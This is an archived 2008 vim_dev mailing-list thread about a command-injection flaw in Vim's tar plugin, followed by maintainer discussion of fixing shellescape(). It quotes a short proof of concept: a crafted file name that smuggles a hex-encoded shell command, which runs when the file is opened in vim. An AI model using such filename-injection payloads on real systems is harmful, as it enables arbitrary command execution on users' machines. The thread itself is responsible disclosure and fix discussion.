Loading ...
Sorry, an error occurred while loading the content.

Re: Fwd: Re: Collection of Vulnerabilities in Fully Patched Vim 7.1

Expand Messages
  • Tony Mechelynck
    ... [...] ... I m seeing this too. Looks like vulnerability to executing arbitrary shell commands via a specially crafted tarfile (which can be zero-length
    Message 1 of 3 , Jul 1, 2008
    • 0 Attachment
      On 02/07/08 02:26, Jan Minář wrote:
      > Looks like this didn't go through, so here it is again:
      [...]
      > The updated tarplugin attack is rather simple:
      >
      > $ rm -rf ./*
      > $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
      > xxd -r\`;'bar.tar"
      > $ vim +:q ./foo*
      > $ ls -l pwned
      > -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
      >
      > Cheers,
      > Jan Minar.

      I'm seeing this too. Looks like vulnerability to executing arbitrary
      shell commands via a specially crafted "tarfile" (which can be
      zero-length as here) with an unusual name. The maintainer of the suspect
      script ($VIMRUNTIME/plugin/tarPlugin.vim and/or
      $VIMRUNTIME/autoload/tar.vim) would be Dr.Chip; I think he's reading
      these groups but I'm adding him as a Bcc just in case (Dr. Chip, sorry
      if you got two copies of this post). FWIW, I'm using tarPlugin.vim v16
      (date not mentioned) and tar.vim v16 (dated Jun 12, 2008) on gvim 7.2a.11

      Best regards,
      Tony.
      --
      Bureaucrat, n.:
      A person who cuts red tape sideways.
      -- J. McCabe

      --~--~---------~--~----~------------~-------~--~----~
      You received this message from the "vim_dev" maillist.
      For more information, visit http://www.vim.org/maillist.php
      -~----------~----~----~----~------~----~------~--~---
    • Bram Moolenaar
      ... I did see it. Thanks for the followup. The problem with the zip plugin was a mistake in the script, using has() instead of exists(). Has already been
      Message 2 of 3 , Jul 2, 2008
      • 0 Attachment
        Jan Minar wrote:

        > Looks like this didn't go through, so here it is again:

        I did see it. Thanks for the followup.

        The problem with the zip plugin was a mistake in the script, using has()
        instead of exists(). Has already been fixed, but it's not distributed
        yet.

        The problem with not escaping %, # and a few others needs to be solved.
        When using "!cmd arg" these characters need to be escaped. However,
        when using system() they must not be escaped, since the backslashes
        won't be removed.

        We could add an optional argument to shellescape() to indicate it's for
        system() or for ":!cmd". With one of them being the default.

        Another way would be to have two functions. Naming them isn't easy
        though. bangescape() and systemescape()?

        I think I prefer adding an argument to shellescape(). That way it's
        also clearer there is a choice if you read the docs.

        --
        hundred-and-one symptoms of being an internet addict:
        139. You down your lunch in five minutes, at your desk, so you can
        spend the rest of the hour surfing the Net.

        /// Bram Moolenaar -- Bram@... -- http://www.Moolenaar.net \\\
        /// sponsor Vim, vote for features -- http://www.Vim.org/sponsor/ \\\
        \\\ download, build and distribute -- http://www.A-A-P.org ///
        \\\ help me help AIDS victims -- http://ICCF-Holland.org ///

        --~--~---------~--~----~------------~-------~--~----~
        You received this message from the "vim_dev" maillist.
        For more information, visit http://www.vim.org/maillist.php
        -~----------~----~----~----~------~----~------~--~---
      Your message has been successfully submitted and would be delivered to recipients shortly.